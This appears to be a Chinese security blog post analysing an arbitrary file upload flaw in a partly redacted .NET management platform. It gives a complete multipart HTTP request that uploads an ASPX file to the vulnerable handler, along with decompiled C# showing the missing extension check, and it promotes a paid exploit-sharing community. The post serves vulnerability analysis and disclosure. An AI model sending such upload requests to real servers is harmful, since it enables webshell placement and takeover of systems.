.NET 漏洞分析 | 某智慧管理平台RCE漏洞

最新推荐文章于 2024-08-06 19:46:20 发布
最新推荐文章于 2024-08-06 19:46:20 发布
阅读量392 收藏 7
点赞数 5
文章标签: .net 安全 矩阵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/140260212
版权

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02漏洞背景

某通智慧管理平台是一套功能强大,运行稳定,操作简单方便,用户界面美观,轻松统计数据的系统。无需安装,只需在后台配置即可在浏览器登录。功能包括:系统管理中心、人员信息管理中心、设备管理中心、水控管理子系统、电控管理子系统、考勤管理子系统、会议签到管理子系统、访客管理子系统。该系统的Upload**.ashx接口存在任意文件上传漏洞。

图片

03漏洞复现

近日外部公开渠道爆出该系统存在RCE漏洞,参数my***没有判断文件扩展名,可以上传任意ASPX脚本,具体的数据包如下所示。

POST /UpLoad**.ashx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Length: 431
Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9
Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywt4cEu1eCdibD89y
X-Requested-With: XMLHttpRequest
------WebKitFormBoundarywt4cEu1eCdibD89y 

Content-Disposition: form-data; name="action" 

post 
------WebKitFormBoundarywt4cEu1eCdibD89y 
Content-Disposition: form-data; name="my***"; filename="1.aspx" 
Content-Type: image/png 

<% response.write(245) %>
------WebKitFormBoundarywt4cEu1eCdibD89y 

上述请求构造的HTTP流将上传的文件名为 1.aspx,其内容包含一段 ASPX 代码,在页面中回显245,并且返回的文件的物理路径,位于Images目录下。如下图所示。

图片

04漏洞分析

存在漏洞的是一个Handler,经过分析得知代码隐藏文件为 UpLoad**.ashx.cs,类为 Ne****.View.test。

HttpPostedFile picture = context.Request.Files[0];
string fileName = picture.FileName;

从请求中获取上传的文件,在处理上传文件将的时候会检查是否存在旧文件名,如果存在会删除旧文件,代码如下所示。

    if (name != "")
    {
        string expr_94 = name;
        if (expr_94.Substring(expr_94.LastIndexOf("/") + 1) != "none.jpg")
        {
            name = name.Replace('/', '\\');
            File.Delete(str + name);
        }
    }

最后生成新文件的相对路径,使用 GUID 生成唯一文件名,这里幸好会返回路径和文件名,否则还不好猜测。具体代码如下所示。

    url = "\\images\\" + Guid.NewGuid().ToString("N") + fileName;
    picture.SaveAs(AppDomain.CurrentDomain.SetupInformation.ApplicationBase + url);
    url = url.Replace('\\', '/');
}

漏洞详情已经打包在星球,感兴趣的朋友可以加入自取。更多的.NET漏洞情报,请加入星球后获取,星球持续更新最新的 .NET 应用漏洞POC,并在每年HW期间提供一手漏洞情报。这些POC/EXP涵盖了一些0day和1day漏洞,确保您始终掌握最前沿的安全信息和防护措施。

图片

 05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

 

dot.Net安全矩阵
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浪潮GS企业管理软件 多处 .NET反序列化RCE漏洞复现
0xSec
07-29 981
浪潮GS企业管理软件bizintegrationwebservice.asmx、xtdysrv.asmx 等接口处存在.net反序列化漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2145
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
NET测试工具
10-06
1. 资源的所有权益归上传用户所有 2. 未经权益所有人同意,不得将资源中的内容挪作商业或盈利用途 3. CSDN下载频道仅提供交流平台,并不能对任何下载资源负责 4. 下载资源中如有侵权或不适当内容,请与我们联系。 5. 本站不保证本站提供的资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
.NET 矩阵6月红队工具和资源集合
ahhacker86的专栏
07-01 537
20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
hvv在即,我们整理了 2024 年部分勒索漏洞清单
FreeBuf_的博客
05-08 1435
可通过官方补丁更新解决该威胁,免费更新链接:https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?威胁者可向用户发送恶意文件并诱导用户打开文件来利用该漏洞,成功利用可能导致绕过 SmartScreen安全功能。
.NET Core中的性能测试工具BenchmarkDotnet
weixin_30678349的博客
09-18 404
背景介绍 之前一篇博客中,我们讲解.NET Core中的CSV解析库,在文章的最后,作者使用了性能基准测试工具BenchmarkDotNet测试了2个不同CSV解析库的性能,本篇我们来详细介绍一下BenchmarkDotNet。 原文链接:https://dotnetcoretutorials.com/2017/12/04/benchmarking-net-core-code-benchmark...
2024-Hvv最新漏洞整理及相应解决方案(五)
最新发布
m0_72210904的博客
08-06 422
漏洞是基于部分安全厂家、软件厂商的公众号或官方网站,以及一些非官方渠道等途径整理的HW安全漏洞情报,情报里附含漏洞详情和解决方案。护网期间我将持续更新分享,希望可以在护网期间帮助到大家。
php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结
weixin_34931142的博客
03-19 1253
一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载:github:https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安全版本ThinkPH...
CVE-2019-18935:RCE漏洞用于ASP.NET AJAX的Telerik UI中的.NET JSON反序列化漏洞
05-25
Telerik UI中用于ASP.NET AJAX的.NET JSON反序列化漏洞的概念验证漏洞,允许远程执行代码。 描述 是用于Web应用程序的UI组件的广泛使用的套件。 它以不安全的方式反序列化JSON对象,从而导致在软件的基础主机上执行...
ThinkPHP RCE漏洞分析合集
hackzkaq的博客
03-18 4256
更多黑客技能 公众号:暗网黑客 作者:掌控安全-veek 一. ThinkPHP 5.0.10-3.2.3 缓存函数设计缺陷可导致代码执行 0x00 背景 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 0x01 实验环境 系统环境 服务器主机:centOS 7 php 5.4版本,apache2,ThinkPHP 5.0.10 0x02 漏洞利用 将 applicati
.Net 诊断工具
iqifenxia的博客
12-07 1462
  起因   本文讲的诊断工具,主要是针对.Net Core 3.1(个别功能不支持)及之后的版本,如.Net 5/.Net 6,对早期的.Net Framework是完全不支持的.即使是.Net Core 3.0之前的版本也不支持,是因为这些工具多数依赖EventPipe组件,EventPipe是CoreCLR的一部分,当然Mono也在增加对EventPipe的支持,所以是支持跨平台的.   这些诊断工具能帮我干什么?   快速定位问题,分析性能瓶颈在哪里可以分析GC,根据内存分配针对性的进行调..
2024-HW最新漏洞整理及相应解决方案(三)
m0_72210904的博客
08-01 568
漏洞是基于部分安全厂家、软件厂商的公众号或官方网站,以及一些非官方渠道等途径整理的HW安全漏洞情报,情报里附含漏洞详情和解决方案。护网期间我将持续更新分享,希望可以在护网期间帮助到大家。
推荐5款超实用的.NET性能分析工具
ljy050618的专栏
11-26 685
摘要:作者把平时工作中使用到的非常不错的.Net分析工具进行总结,在此分享给大家。希望它们能帮助到你! 虽然.NET框架号称永远不会发生内存泄漏,原因是引入了内存回收机制。但在实际应用中,往往我们分配了对象但没有释放指向该对象的引用,导致对象永远无法释放。最常见的情况就是给对象添加了事件处理函数,但当不再使用该对象时却没有将该函数从对象的事件handler中减掉。另外如果分配了非托管内存
.Net性能测试工具BenchmarkDotnet
DHZYKN
01-22 377
转自:.Net性能测试工具BenchmarkDotnet_郑廿三-CSDN博客_benchmarkdotnet
HW漏洞威胁情报第二天|HW情报
weixin_43167326的博客
07-24 1697
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!帆软V11 0day sql注入至rce浪潮财务云反序列化rce通达V11.10 前台sql注入金万维异速联云联应用系统GNRemote存在远程命令执行漏洞(已复现)
HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现
xnxqwzy的博客
10-08 222
最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。
我的第一篇文章:.net 平台性能测试工具BenchmarkDotNet
weixin_37648525的博客
02-28 726
.net 平台性能测试工具BenchmarkDotNet 写在前面的话 在CSDN逛了好几年,平常工作中也受到了好多大佬博文的帮助,平时这些东西都是写在onet note,如今有空也想自发表一下文章,记录下一些学习和工作的内容,也希望能够帮到别人。 以下正文 BenchmarkDotNet 最近因为项目需要,在写业务算法类库,里面对数据修约要求比较严格,为了保留位数正确,在计算过程中需要多次进行Decimal和string的转换,担心太多的转换操作会导致性能变差,于是就想到对代码做一下性能测试,网上
.NET Framework漏洞(CVE-2017-8759)复现及后续渗透
sanc7ane的博客
02-25 7280
参考:!bhdresh 简介 CVE-2017-8759是一个新型的Office文档高级威胁攻击漏洞,该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码。FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本。黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net...
DataContractSerializer漏洞剖析:RCE攻击向量与审计
.NET高级代码审计课程的第六课中,主要探讨的是DataContractSerializer反序列化漏洞。DataContractSerializer是.NET框架中的一个用于序列化和反序列化数据的重要工具,它隶属于System.Runtime.Serialization命名...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值